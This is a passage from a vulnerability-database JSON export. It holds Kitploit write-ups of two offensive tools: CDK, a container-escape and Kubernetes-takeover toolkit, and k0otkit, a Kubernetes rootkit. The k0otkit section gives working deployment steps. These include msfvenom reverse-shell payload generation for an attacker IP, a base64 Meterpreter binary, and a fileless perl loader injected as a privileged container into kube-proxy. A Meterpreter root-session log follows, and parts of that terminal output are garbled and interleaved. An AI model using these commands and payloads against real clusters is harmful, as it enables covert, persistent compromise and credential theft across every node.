"THN:F6202F3C31F7C788D1830F976D0B2464"]}, {"type": "threatpost", "idList": ["THREATPOST:1EFFF77A39E186D173F6DF0D1259D4DE", "THREATPOST:28F667D81C6074266934A97C7BE4DE9B", "THREATPOST:370E8753340A65AA22C611DB35A611BA", "THREATPOST:4855D753AD8D155F3665D0814ABB393B", "THREATPOST:639EA1C04C8045117A5A3480A9967CB7", "THREATPOST:B4C48A638705549FED64000361BA8526"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A8C47E018FA9A3D0723FC3A99FD592A7", "TRENDMICROBLOG:DD93FD0A6FE52A3DFF89C6F550E981D1"]}, {"type": "ubuntu", "idList": ["USN-3832-1", "USN-3833-1", "USN-4048-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-11253", "UB:CVE-2019-13139", "UB:CVE-2019-9512", "UB:CVE-2019-9514", "UB:CVE-2020-14386", "UB:CVE-2020-15257", "UB:CVE-2020-8554", "UB:CVE-2020-8557", "UB:CVE-2020-8558"]}, {"type": "virtuozzo", "idList": ["VZA-2019-008"]}, {"type": "vmware", "idList": ["VMSA-2019-0001.3"]}, {"type": "zdt", "idList": ["1337DAY-ID-31636", "1337DAY-ID-31692", "1337DAY-ID-32165", "1337DAY-ID-32182"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2016-5195", "epss": "0.817320000", "percentile": "0.977760000", "modified": "2023-03-16"}, {"cve": "CVE-2017-1002101", "epss": "0.001310000", "percentile": "0.463100000", "modified": "2023-03-16"}, {"cve": "CVE-2018-1002105", "epss": "0.734150000", "percentile": "0.975110000", "modified": "2023-03-16"}, {"cve": "CVE-2018-15664", "epss": "0.000690000", "percentile": "0.280310000", "modified": "2023-03-16"}, {"cve": "CVE-2018-18955", "epss": "0.000930000", "percentile": "0.381200000", "modified": "2023-03-17"}, {"cve": "CVE-2019-11253", "epss": "0.005830000", "percentile": "0.747950000", "modified": "2023-03-16"}, {"cve": "CVE-2019-13139", "epss": "0.002450000", "percentile": "0.606820000", "modified": "2023-03-16"}, {"cve": "CVE-2019-14271", "epss": "0.007620000", "percentile": "0.783510000", "modified": "2023-03-17"}, {"cve": "CVE-2019-5736", "epss": "0.004010000", "percentile": "0.695320000", "modified": "2023-03-16"}, {"cve": "CVE-2019-9512", "epss": "0.198720000", "percentile": "0.955040000", "modified": "2023-03-16"}, {"cve": "CVE-2019-9514", "epss": "0.901000000", "percentile": "0.981790000", "modified": "2023-03-16"}, {"cve": "CVE-2020-14386", "epss": "0.000450000", "percentile": "0.120470000", "modified": "2023-03-16"}, {"cve": "CVE-2020-15257", "epss": "0.000450000", "percentile": "0.121690000", "modified": "2023-03-16"}, {"cve": "CVE-2020-2023", "epss": "0.000560000", "percentile": "0.211060000", "modified": "2023-03-16"}, {"cve": "CVE-2020-2025", "epss": "0.000440000", "percentile": "0.102490000", "modified": "2023-03-16"}, {"cve": "CVE-2020-2026", "epss": "0.000540000", "percentile": "0.197220000", "modified": "2023-03-16"}, {"cve": "CVE-2020-8554", "epss": "0.001310000", "percentile": "0.462580000", "modified": "2023-03-17"}, {"cve": "CVE-2020-8557", "epss": "0.000440000", "percentile": "0.102490000", "modified": "2023-03-16"}, {"cve": "CVE-2020-8558", "epss": "0.000870000", "percentile": "0.350000000", "modified": "2023-03-16"}], "vulnersScore": 0.6}, "_state": {"dependencies": 1660032824, "score": 1660034202, "epss": 1679073339}, "_internal": {"score_hash": "fb270338f063aad8cd4a08e91964addb"}, "toolHref": "https://github.com/brant-ruan/metarget"}

{"kitploit": [{"lastseen": "2022-09-18T12:05:43", "description": "[](<https://1.bp.blogspot.com/-2lJSZ4nVz7c/YAZqglkVwBI/AAAAAAAAVCY/B20ZGieRBygx-iFXzmO6t4YKqS_I8eNXQCNcBGAsYHQ/s1000/h.jpg>)\n\n \n\n\nCDK is an open-sourced container penetration toolkit, designed for offering stable [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) in different slimmed [containers](<https://www.kitploit.com/search/label/Containers> \"containers\" ) without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs helps you to escape container and takeover K8s cluster easily.\n\nCurrently still under development, submit [issues](<https://github.com/cdk-team/CDK/issues> \"issues\" ) or mail some-email@example.com if you need any help.\n\n \n\n\n**Installation** \n\n\nDownload latest release in: <https://github.com/cdk-team/CDK/releases/>\n\nDrop executable files into target container and start testing.\n\n \n**Usage** \n\n \n \n Usage: \n cdk evaluate [--full] \n cdk run (--list | <exploit> [<args>...]) \n cdk auto-escape <cmd> \n cdk <tool> [<args>...] \n \n Evaluate: \n cdk evaluate Gather information to find weakness inside container. \n cdk evaluate --full Enable file scan during information gathering. \n \n Exploit: \n cdk run --list List all available exploits. \n cdk run <exploit> [<args>...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki \n \n Auto Escape: \n cdk auto-escape <cmd> Escape container in different ways then let target execute <cmd>. \n \n Tool: \n vi <file> Edit files in container like \"vi\" command. \n ps Show process information like \"ps -ef\" command. \n nc [options] Create TCP tunnel. \n ifconfig Show network information. \n kcurl <path> (get|post) <uri> <data> Make request to K8s api-server. \n ucurl (get|post) <socket> <uri> <data> Make request to docker unix socket. \n probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000 \n \n Options: \n -h --help Show this help msg. \n -v --version Show version. \n \n\n \n**Features** \n\n\nCDK have three modules:\n\n 1. Evaluate: gather information inside container to find potential weakness.\n 2. Exploit: for container escaping, persistance and lateral movement\n 3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.\n \n**Evaluate Module** \n\n\nUsage\n \n \n cdk evaluate [--full] \n \n\nThis command will run the scripts below without local file scanning, using `--full` to enable all.\n\nTactics | Script | Supported | Usage/Example \n---|---|---|--- \nInformation Gathering | OS Basic Info | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Evaluate:-System-Info> \"link\" ) \nInformation Gathering | Available Capabilities | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Commands-and-Capabilities> \"link\" ) \nInformation Gathering | Available Linux Commands | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Commands-and-Capabilities> \"link\" ) \nInformation Gathering | Mounts | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Mounts> \"link\" ) \nInformation Gathering | Net Namespace | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Net-Namespace> \"link\" ) \nInformation Gathering | Sensitive ENV | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Services> \"link\" ) \nInformation Gathering | Sensitive Process | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Services> \"link\" ) \nInformation Gathering | Sensitive Local Files | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Sensitive-Files> \"link\" ) \nDiscovery | K8s Api-server Info | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server> \"link\" ) \nDiscovery | K8s Service-account Info | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-Service-Account> \"link\" ) \nDiscovery | Cloud Provider [Metadata](<https://www.kitploit.com/search/label/Metadata> \"Metadata\" ) API | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Evaluate:-Cloud-Provider-Metadata-API> \"link\" ) \n \n**Exploit Module** \n\n\nList all available exploits:\n \n \n cdk run --list \n \n\nRun targeted exploit:\n \n \n cdk run <script-name> [options] \n \n\nTactic | Technique | CDK Exploit Name | Supported | Doc \n---|---|---|---|--- \nEscaping | docker-runc CVE-2019-5736 | runc-pwn | \n\n\u2714\n\n| \nEscaping | docker-cp CVE-2019-14271 | | | \nEscaping | containerd-shim CVE-2020-15257 | shim-pwn | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-shim-pwn> \"link\" ) \nEscaping | dirtycow CVE-2016-5159 | | | \nEscaping | docker.sock PoC (DIND attack) | docker-sock-check | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-check> \"link\" ) \nEscaping | docker.sock [Backdoor](<https://www.kitploit.com/search/label/Backdoor> \"Backdoor\" ) Image Deploy | docker-sock-deploy | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-deploy> \"link\" ) \nEscaping | Device Mount Escaping | mount-disk | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-mount-disk> \"link\" ) \nEscaping | Cgroups Escaping | mount-cgroup | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-mount-cgroup> \"link\" ) \nEscaping | Procfs Escaping | mount-procfs | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-mount-procfs> \"link\" ) \nEscaping | Ptrace Escaping PoC | check-ptrace | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-check-ptrace> \"link\" ) \nDiscovery | K8s Component Probe | service-probe | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-service-probe> \"link\" ) \nDiscovery | Dump Istio Sidecar Meta | istio-check | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-check-istio> \"link\" ) \nLateral Movement | K8s Service Account Control | | | \nLateral Movement | Attack K8s api-server | | | \nLateral Movement | Attack K8s Kubelet | | | \nLateral Movement | Attack K8s Dashboard | | | \nLateral Movement | Attack K8s Helm | | | \nLateral Movement | Attack K8s Etcd | | | \nLateral Movement | Attack Private Docker Registry | | | \nRemote Control | Reverse Shell | reverse-shell | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-reverse-shell> \"link\" ) \nCredential Access | Access Key Scanning | ak-leakage | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-ak-leakage> \"link\" ) \nCredential Access | Dump K8s Secrets | k8s-secret-dump | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-secret-dump> \"link\" ) \nCredential Access | Dump K8s Config | k8s-configmap-dump | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-configmap-dump> \"link\" ) \nPersistence | Deploy WebShell | | | \nPersistence | Deploy Backdoor Pod | k8s-backdoor-daemonset | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-backdoor-daemonset> \"link\" ) \nPersistence | Deploy Shadow K8s api-server | k8s-shadow-apiserver | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-shadow-apiserver> \"link\" ) \nPersistence | K8s MITM Attack (CVE-2020-8554) | k8s-mitm-clusterip | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Evaluate:-k8s-mitm-clusterip> \"link\" ) \nPersistence | Deploy K8s CronJob | | | \nDefense Evasion | Disable K8s Audit | | | \n \n**Tool Module** \n\n\nRunning commands like in Linux, little different in input-args, see the usage link.\n \n \n cdk nc [options] \n cdk ps \n \n\nCommand | Description | Supported | Usage/Example \n---|---|---|--- \nnc | TCP Tunnel | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Tool:-nc> \"link\" ) \nps | Process Information | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Tool:-ps> \"link\" ) \nifconfig | Network Information | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Tool:-ifconfig> \"link\" ) \nvi | Edit Files | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Tool:-vi> \"link\" ) \nkcurl | Request to K8s api-server | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Tool:-kcurl> \"link\" ) \ndcurl | Request to Docker HTTP API | | \nucurl | Request to Docker Unix Socket | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Tool:-ucurl> \"link\" ) \nrcurl | Request to Docker Registry API | | \nprobe | IP/Port Scanning | \n\n\u2714\n\n| [link](<https://github.com/cdk-team/CDK/wiki/Tool:-probe> \"link\" ) \n \n**Developer Docs** \n\n\n * [run test in container.](<https://github.com/cdk-team/CDK/wiki/Run-Test> \"run test in container.\" )\n \n**TODO** \n\n\n 1. Echo loader for delivering CDK into target container via Web RCE.\n 2. EDR defense evasion.\n 3. Compile optimization.\n 4. Dev docs\n \n \n\n\n**[Download CDK](<https://github.com/cdk-team/CDK> \"Download CDK\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-21T11:30:00", "type": "kitploit", "title": "CDK - Zero Dependency Container Penetration Toolkit", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5159", "CVE-2019-14271", "CVE-2019-5736", "CVE-2020-15257", "CVE-2020-8554"], "modified": "2021-01-21T11:30:06", "id": "KITPLOIT:1751489026679880812", "href": "http://www.kitploit.com/2021/01/cdk-zero-dependency-container.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-28T22:55:17", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfBgPscpMPY39QWUh4SYV9BcbTwt1utjIASCk-VRj1OrFK5Qe1FBPP_Ycg15Ft31qla39vkFyLZCXUFF2Bagj4LnLwBZ2PsOktWQ4lthy9V92fsi0mBRERU8q84VgfeFgq5GcqcivdI3LLpyySMrRLSfZJSs12xub_auogYSEjDumQR4fxGjr3YPYd/s1080/k0otkit.png>)\n\n \n\n\nk0otkit is a universal post-penetration technique which could be used in penetrations against [Kubernetes](<https://www.kitploit.com/search/label/Kubernetes> \"Kubernetes\" ) clusters.\n\nWith k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell).\n\nk0otkit is the combination of **Kubernetes** and **rootkit**.\n\nPrerequisite:\n\n**k0otkit is a post-penetration tool, so you have to firstly conquer a cluster, somehow manage to escape from the container and get the root privilege of the master node (to be exact, you should get the admin privilege of the target Kubernetes).**\n\nScenario:\n\n 1. After Web penetration, you get a shell of the target.\n 2. If necessary, you manage to escalate the privilege and make it.\n 3. You find the target environment is a container (Pod) in a Kubernetes cluster.\n 4. You manage to escape from the container and make it (with CVE-2016-5195, CVE-2019-5736, docker.sock or other techniques).\n 5. You get a root shell of the master node and are able to instruct the cluster with `kubectl` on the master node as `admin`.\n 6. Now you want to control all the nodes in the cluster as quickly as possible. **Here comes k0otkit!**\n\nk0otkit is detailed in _[k0otkit: Hack K8s in a K8s Way](<https://mp.weixin.qq.com/s/H48WNRRtlJil9uLt-O9asw> \"k0otkit: Hack K8s in a K8s Way\" )_.\n\n \n\n\n## Usage\n\nMake sure you have got the root shell on the master node of the target Kubernetes. (You can also utilize k0otkit if you have the admin privilege of the target Kubernetes, though you might need to modify the `kubectl` command in `k0otkit_template.sh` to use the token or certification.)\n\nMake sure you have installed [Metasploit](<https://www.kitploit.com/search/label/Metasploit> \"Metasploit\" ) on your attacker host (`msfvenom` and `msfconsole` should be available).\n\n**Deploy k0otkit**\n\nClone this repository:\n \n \n git clone https://github.com/brant-ruan/k0otkit \n cd k0otkit/ \n chmod +x ./*.sh\n\nReplace the attacker's IP and port in `pre_exp.sh` with your own IP and port:\n \n \n ATTACKER_IP=192.168.1.107 \n ATTACKER_PORT=4444\n\nGenerate k0otkit:\n \n \n ./pre_exp.sh\n\n`k0otkit.sh` will be generated. Then run the reverse shell handler:\n \n \n ./handle_multi_reverse_shell.sh\n\nOnce the handler is ready, copy the content of `k0otkit.sh` and paste it into your shell on the master node of the target Kubernetes, then press `<Enter>` to execute it.\n\nWait a moment and enjoy [reverse shells](<https://www.kitploit.com/search/label/Reverse%20Shells> \"reverse shells\" ) from all nodes :)\n\nP.S. It is not limited how many Kubernetes clusters you manipulate with k0otkit.\n\n**Interact with Shells**\n\nAfter the successful deployment of k0otkit, you can interact with any reverse shell as you want:\n \n \n # within msfconsole \n sessions 1\n\n## Features\n\n * utilize K8s resources and features (hack K8s in a K8s way)\n * dynamic container injection\n * communication [encryption](<https://www.kitploit.com/search/label/Encryption> \"encryption\" ) (thanks to Meterpreter)\n * fileless\n\n## Example\n\nGenerate k0otkit:\n \n \n some-email@example.com:~/k0otkit$ ./pre_exp.sh \n + ATTACKER_IP=192.168.1.107 \n + ATTACKER_PORT=4444 \n + TEMP_MRT=mrt \n + msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.107 -f elf -o mrt \n ++ xxd -p mrt \n ++ tr -d '\\n' \n ++ base64 -w 0 \n + PAYLOAD=N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw \n + sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAx MDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_template.sh \n \n\nRun the reverse shell handler:\n \n \n some-email@example.com:~/k0otkit$ ./handle_multi_reverse_shell.sh \n payload => linux/x86/meterpreter/reverse_tcp \n LHOST => 0.0.0.0 \n LPORT => 4444 \n ExitOnSession => false \n [*] Exploit running as background job 0. \n [*] Exploit completed, but no session was created. \n \n [*] Started reverse TCP handler on 0.0.0.0:4444 \n msf5 exploit(multi/handler) > \n \n\nCopy the content of `k0otkit.sh` into your shell on the master node of the target Kubernetes and press `<Enter>`:\n \n \n some-email@example.com:~$ nc -lvnp 10000 \n listening on [any] 10000 ... \n connect to [192.168.1.107] from (UNKNOWN) [192.168.1.106] 48750 \n some-email@example.com:~# volume_name=cache \n \n mount_path=/var/kube-proxy-cache \n \n ctr_name=kube-proxy-cache \n \n binary_file=/usr/local/bin/kube-proxy-cache \n \n payload_name=cache \n \n secret_name=proxy-cache \n \n secret_data_name=content \n \n ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ containers:/{print NR}') \n \n volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}') \n \n image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep \" image:\" | awk '{print $2}') \n \n # create payload secret \n cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f - \n apiVersion: v1 \n kind: Secret \n metad ata: \n name: $secret_name \n namespace:volume_name=cache \n some-email@example.com:~# \n some-email@example.com:~# mount_path=/var/kube-p kube-system \n type: Opaque \n data: \n $secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw \n EOF \n \n # assume that ctr_line_num < volume_line_num \n # otherwise you should switch the two sed commands below \n \n # inject malicious container into kube-proxy pod \n kubecroxy-cache \n some-email@example.com:~# \n some-email@example.com:~# ctr_n ame=kube-proxy-cache \n some-email@example.com:~# \n some-email@example.com:~# binary_file=/usr/local/bin/kube-proxy-cache \n some-email@example.com:~# \n some-email@example.com:~# payload_name=cache \n some-email@example.com:~# \n some-email@example.com:~# secret_name=proxy-cache \n some-email@example.com:~# \n some-email@example.com:~# secret_data_name=content \n some-email@example.com:~# \n some-email@example.com:~# ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-tl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \\ \n | sed \"$volume_line_num a\\ \\ \\ \\ \\ \\ - name: $volume_name\\n hostPath:\\n path: /\\n type: Directory\\n\" \\ \n | sed \"$ctr_line_num a\\ \\ \\ \\ \\ \\ - name: $ctr_name\\n image: $image\\n imagePullPolicy: IfNotPresent\\n command: [\\\"sh\\\"]\\n args: [\\\"-c\\\", \\\"echo \\$$payload_name | perl -e 'my \\$n=qq(); my \\$fd=syscall(319, \\$n, 1); open(\\$FH, qq(>&=).\\$fd); select((select(\\$FH), \\$|=1)[0]); print \\$FH pack q/H*/, <ST DIN>; my \\$pid = fork(); if (0 != \\$pid) { wait }; if (0 == \\$pid){system(qq(/proc/\\$\\$\\$\\$/fd/\\$fd))}'\\\"]\\n env:\\n - name: $payload_name\\n valueFrom:\\n secretKeyRef:\\n pr name: $secret_name\\n key: $secret_data_name\\n securityContext:\\n privileged: true\\n volumeMounts:\\n - mountPath: $mount_path\\n name: $volume_name\" \\ \n containers:/{print NR}')oxy -o yaml | awk '/ \n \n some-email@example.com:~# \n some-email@example.com:~# volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}') \n some-email@example.com:~# \n some-email@example.com:~# image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep \" image:\" | awk '{print $2}') \n some-email@example.com:~# \n some-email@example.com:~# # create payload secret \n some-email@example.com:~# cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f - \n > apiVersion: v1 \n > kind: Secret \n > metadata: \n > name: $secret_name \n > namespace: kube-system \n > type: Opaque \n > data: \n > $secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODEzZjM2ODAyMDAxMTVjODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw \n > EOF \n secret/proxy-cache created \n some-email@example.com:~# \n some-email@example.com:~# # assume that ctr_line_num < volume_line_num \n some-email@example.com:~# # otherwise you should switch the two sed commands below \n some-email@example.com:~# \n some-email@example.com im-2:~# # inject malicious container into kube-proxy pod \n some-email@example.com:~# kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \\ \n > | sed \"$volume_line_num a\\ \\ \\ \\ \\ \\ - name: $volume_name\\n hostPath:\\n path: /\\n type: Directory\\n\" \\ \n > | sed \"$ctr_line_num a\\ \\ \\ \\ \\ \\ - name: $ctr_name\\n image: $image\\n imagePullPolicy: IfNotPresent\\n command: [\\\"sh\\\"]\\n args: [\\\"-c\\\", \\\"echo \\$$payload_name | perl -e 'my \\$n=qq(); my \\$fd=syscall(319, \\$n, 1); open(\\$FH, qq(>&=).\\$fd); select((select(\\$FH), \\$|=1)[0]); print \\$FH pack q/H*/, <STDIN>; my \\$pid = fork(); if (0 != \\$pid) { wait }; if (0 == \\$pid){system(qq(/proc/\\$\\$\\$\\$/fd/\\$fd))}'\\\"]\\n env:\\n - name: $payload_name\\n valueFrom:\\n secretKeyRef:\\n name: $secret_name\\n key: $secret_data_name\\n securityContext:\\n privileged: true\\ n volumeMounts:\\n - mountPath: $mount_path\\n name: $volume_name\" \\ \n > | kubectl replace -f - \n daemonset.extensions/kube-proxy replaced \n \n\nWait for reverse shells:\n \n \n msf5 exploit(multi/handler) > [*] Sending stage (985320 bytes) to 192.168.1.106 \n [*] [Meterpreter](<https://www.kitploit.com/search/label/Meterpreter> \"Meterpreter\" ) session 1 opened (192.168.1.107:4444 -> 192.168.1.106:51610) at 2020-11-30 03:30:18 -0500 \n \n msf5 exploit(multi/handler) > sessions \n \n Active sessions \n =============== \n \n Id Name Type Information Connection \n -- ---- ---- ----------- ---------- \n 1 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.168.1.106 192.168.1.107:4444 -> 192.168.1.106:51610 (192.168.1.106) \n \n\nFunction 1 Exit &amp; Re-connect:\n \n \n msf5 exploit(multi/handler) > sessions 1 \n [*] Starting interaction with 1... \n \n meterpreter > shell \n Process 9 created. \n Channel 1 created. \n whoami \n root \n exit \n meterpreter > exit \n [*] Shutting down Meterpreter... \n \n [*] 192.168.1.106 - Meterpreter session 1 closed. Reason: User exit \n msf5 exploit(multi/handler) > \n [*] Sending stage (985320 bytes) to 192.168.1.106 \n [*] Meterpreter session 2 opened (192.168.1.107:4444 -> 192.168.1.106:52292) at 2020-11-30 03:32:25 -0500 \n \n\nFunction 2 Escape to &amp; Control Node:\n \n \n msf5 exploit(multi/handler) > sessions 2 \n [*] Starting interaction with 2... \n \n meterpreter > cd /var/kube-proxy-cache \n meterpreter > ls \n Listing: /var/kube-proxy-cache \n ============================== \n \n Mode Size Type Last modified Name \n ---- ---- ---- ------------- ---- \n 40755/rwxr-xr-x 4096 dir 2020-03-03 03:21:08 -0500 bin \n 40755/rwxr-xr-x 4096 dir 2020-03-05 22:23:56 -0500 boot \n 40755/rwxr-xr-x 4180 dir 2020-04-09 21:32:10 -0400 dev \n 40755/rwxr-xr-x 4096 dir 2020-04-17 02:31:15 -0400 etc \n 40755/rwxr-xr-x 4096 dir 2020-03-03 03:00:00 -0500 home \n 100644/rw-r--r-- 36257923 fil 2020-03-05 22:23:56 -0500 initrd.img \n 100644/rw-r--r-- 39829184 fil 